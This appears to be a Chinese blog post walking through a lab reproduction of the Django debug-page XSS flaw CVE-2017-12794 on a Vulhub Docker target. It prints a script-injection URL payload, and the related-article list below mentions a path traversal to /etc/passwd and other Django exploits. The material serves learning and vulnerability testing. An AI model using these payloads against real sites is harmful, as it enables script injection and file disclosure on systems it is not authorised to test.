Django debug page XSS漏洞(CVE-2017-12794)漏洞复现

最新推荐文章于 2024-06-21 10:28:25 发布
最新推荐文章于 2024-06-21 10:28:25 发布
阅读量373 收藏 1
点赞数
分类专栏: docker 漏洞复现 文章标签: xss 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huayimy/article/details/130627486
版权

声明

严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !

目录

一、环境搭建:

二、攻击复现:

一、环境搭建:

用Kali的docker启动Vulhub

 访问http://192.168.xxx.xxx:8000/

 

二、攻击复现:

Xss注入攻击

http://192.168.xxx.xxx:8000/create_user/?username=%3Cscript%3Ealert(123)%3C/script%3E

 

再次注入

http://192.168.xxx.xxx:8000/create_user/?username=%3Cscript%3Ealert(123)%3C/script%3E

 攻击成功

huayimu
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
XSS漏洞复现CVE-2017-12794
m0_56578216的博客
08-30 367
前提条件:1.
CVE-2017-12794 存储型xss漏洞
m0_63034363的博客
07-09 1037
CVE-2017-12794 存储型xss漏洞 主要是因为数据库报错将恶意代码爆出造成xss弹框
CVE-2020-7471原理分析及复现
无知亦乐
01-10 1129
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录漏洞简介漏洞影响版本一、漏洞原理分析二、相关说明三、复现总结 漏洞简介 2020年2月3日,Django 官方发布安全通告公布了一个通过StringAgg(分隔符)实现利用的潜在SQL注入漏洞CVE-2020-7471)。攻击者可通过构造分隔符传递给聚合函数contrib.postgres.aggregates.StringAgg,从而绕过转义符号(\)并注入恶意SQL语句。 漏洞影响版本 一、漏洞原理分析 在 Github
CVE-2017-12794_Django debug page XSS漏洞
mirocky的博客
12-28 626
3、向数据库中插入相同数据,Django报错,数据被打印且执行。对打印的exception进行了HTML转义。2、首次向数据库中插入数据,成功插入。1、vulhub搭建环境。
Python 开发 框架安全Django SQL注入漏洞测试.(CVE-2021-35042)
网络安全领域___专研者.
05-08 713
Django 是一个用 Python 编写的 Web 应用程序框架。它提供了许多工具和库,使得开发 Web 应用程序变得更加容易和高效。Django 遵循了“MTV”(模型-模板-视图)的设计模式,将应用程序的不同组件分离开来,使得开发人员可以更加专注于应用程序的不同方面。
buuctf [Django]CVE-2017-12794
qq_1873822的博客
03-31 558
漏洞描述 DjangoDjango软件基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。Django1.10.8之前的版本和1.11.5之前的1.11.x版本中的Technical500Template存在安全漏洞,该漏洞源于程序没有正确的过滤用户提交的输入。远程攻击者可利用该漏洞在浏览器中执行任意脚本代码。 https://blog.csdn.net/zy15667076526/article/details/111134982 漏洞影响 Djang
漏洞复现Django _2.0.8_任意URL跳转漏洞(CVE-2018-14574)
过期的秋刀鱼
11-05 538
Django是一个广泛使用的Python web框架,它有很多方便和强大的功能。但是,像任何其他软件一样,Django也可能存在安全漏洞,这个漏洞Django的CommonMiddleware中可能导致开放重定向。的情况下,Django没做处理,导致浏览器认为目的地址是绝对路径,最终造成任意URL跳转漏洞。​ Django默认配置下,如果匹配上的URL路由中最后一位是。,Django默认会跳转到带/的请求中。Django版本
Django 开发调试工具 Django-debug-toolbar使用详解
09-19
**Django调试利器:Django-debug-toolbar** Django-debug-toolbar是一款强大的开源调试工具,它为Django开发者提供了丰富的请求和响应信息,帮助开发者快速定位和解决问题。通过在Django项目的界面中集成一系列可...
django-debug-toolbar-request-history
05-26
pip install django-debug-toolbar-request-history 然后将面板添加到DEBUG_TOOLBAR_PANELS (有关更多详细信息,请参见config部分)。 注意:现在仅支持Django Debug Toolbar 2.0及更高版本。 对于旧版本,请
CVE-2020-7471:django 漏洞CVE-2020-7471 Potential SQL injection via StringAgg(delimiter) 的漏洞环境和 POC
04-14
CVE-2020-7471这个仓库提供 CVE-2020-7471 Potential SQL injection via StringAgg(delimiter) 漏洞的环境和 POC受影响的 django 版本1.11 到 1.11.28(不含)2.2 到 2.2.10(不含)3.0 到 3.0.3(不含)下载使用前...
Django_CVE-2020-9402_Geo_SQL注入分析1
08-03
然而,在 Django 中的 GIS 查询中存在一个_sql 注入漏洞,编号为 CVE-2020-9402,这个漏洞允许攻击者执行恶意的 SQL 语句,从而获取敏感信息或控制服务器。 GIS 查询란什么? GIS 查询是 Geographic Information ...
Django1.11.4 XSS漏洞复现CVE-2017-12794
m0_63699746的博客
07-20 253
Django是重量级选手中最有代表性的一位。首先定义了dj错误类型数组,以及获取了db的错误类型,判断出现错误类型是否在db的错误类型中,如果存在,则将dj.exc.value.__cause__=exc.value (图上没有可能是因为在1.11.5版本下),直接将错误的值传给__cause__,而在500页面中会输出__cause__的值。docker启动vluhub中的CVE-2017-12794漏洞环境。新版本1.11.5,修复了1.11.4中500页面中可能存在的一个XSS漏洞
Django及Flask漏洞合集
小小猪的博客
08-20 3325
Django漏洞 Django任意代码执行 poc: import os os.environ.setdefault('DJANGO_SETTINGS_MODULE','settings') from django.conf import settings from django.core import signing from django.contrib.sessions.backends import signed_cookies class
Django -CSRF漏洞
二进制杯莫停的博客
02-08 554
    跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。 1 CSR...
Django_debug_page_XSS漏洞 CVE-2017-12794 漏洞复现
ADummy的博客
02-22 312
Django debug page XSS漏洞(CVE-2017-12794) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>用户创建成功—>成功登录 0x01漏洞介绍 ​ Django默认配置下,如果匹配上的URL路由中最后一位是/,而用户访问的时候没加/,Django默认会跳转到带/的请求中。(由配置项中的django.middleware.common.CommonMiddleware、APPEND_SLASH来决定)。在path开头为//example.
python框架漏洞
weixin_68408599的博客
12-10 1334
此博客讲述的是基于python框架的各种漏洞复现以及原理,包括sql注入以及ssti模板注入进行复现的过程,以及造成漏洞形成的粗略原理,靶场环境来自vulhub。
框架漏洞-CVE复现-Node.JS+Jquery+Django+Flask
xiaoheizi的博客
07-18 777
Django采用了MTV的框架模式,即模型M,视图V和模版T,使用Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。访问:/admin/vuln/collection/?描述:Node.js-systeminformation是用于获取各种信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数注入payload执行系统命令。添加请求路径:/static/../../../a/../../../../etc/passwd 成功获取敏感信息。
Web渗透:XSS-DOM-based XSS
最新发布
WolvenSec的博客
06-21 1000
DOM-based XSS(基于DOM的跨站脚本攻击)是一种XSS攻击类型,其特点是恶意脚本通过操作文档对象模型(DOM)直接在客户端执行,而无需经过服务器的处理。这种攻击主要利用客户端JavaScript代码中的漏洞,使得攻击者能够在浏览器中注入并执行恶意代码。
漏洞还原的拟使用的方法
06-10
漏洞还原一般可以通过以下几个步骤来进行: 1. 收集信息:收集与漏洞相关的信息,包括漏洞的描述、漏洞所在软件或系统的版本、漏洞的利用方式等。 2. 环境搭建:搭建与漏洞相关的环境,包括操作系统、应用程序、网络配置等。 3. 漏洞还原:通过漏洞利用工具或手动操作的方式,还原漏洞的利用过程,深入了解漏洞的原理和影响。 4. 分析总结:对漏洞还原的结果进行分析和总结,包括漏洞的利用方式、漏洞的原因、漏洞的影响等。 5. 报告和修复:根据漏洞还原的结果,撰写漏洞报告,向软件或系统的开发人员提供相关信息,帮助他们修复漏洞,提高软件或系统的安全性和可靠性。 需要注意的是,漏洞还原需要严格遵守法律法规和道德规范,避免对他人的合法权益造成损害。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值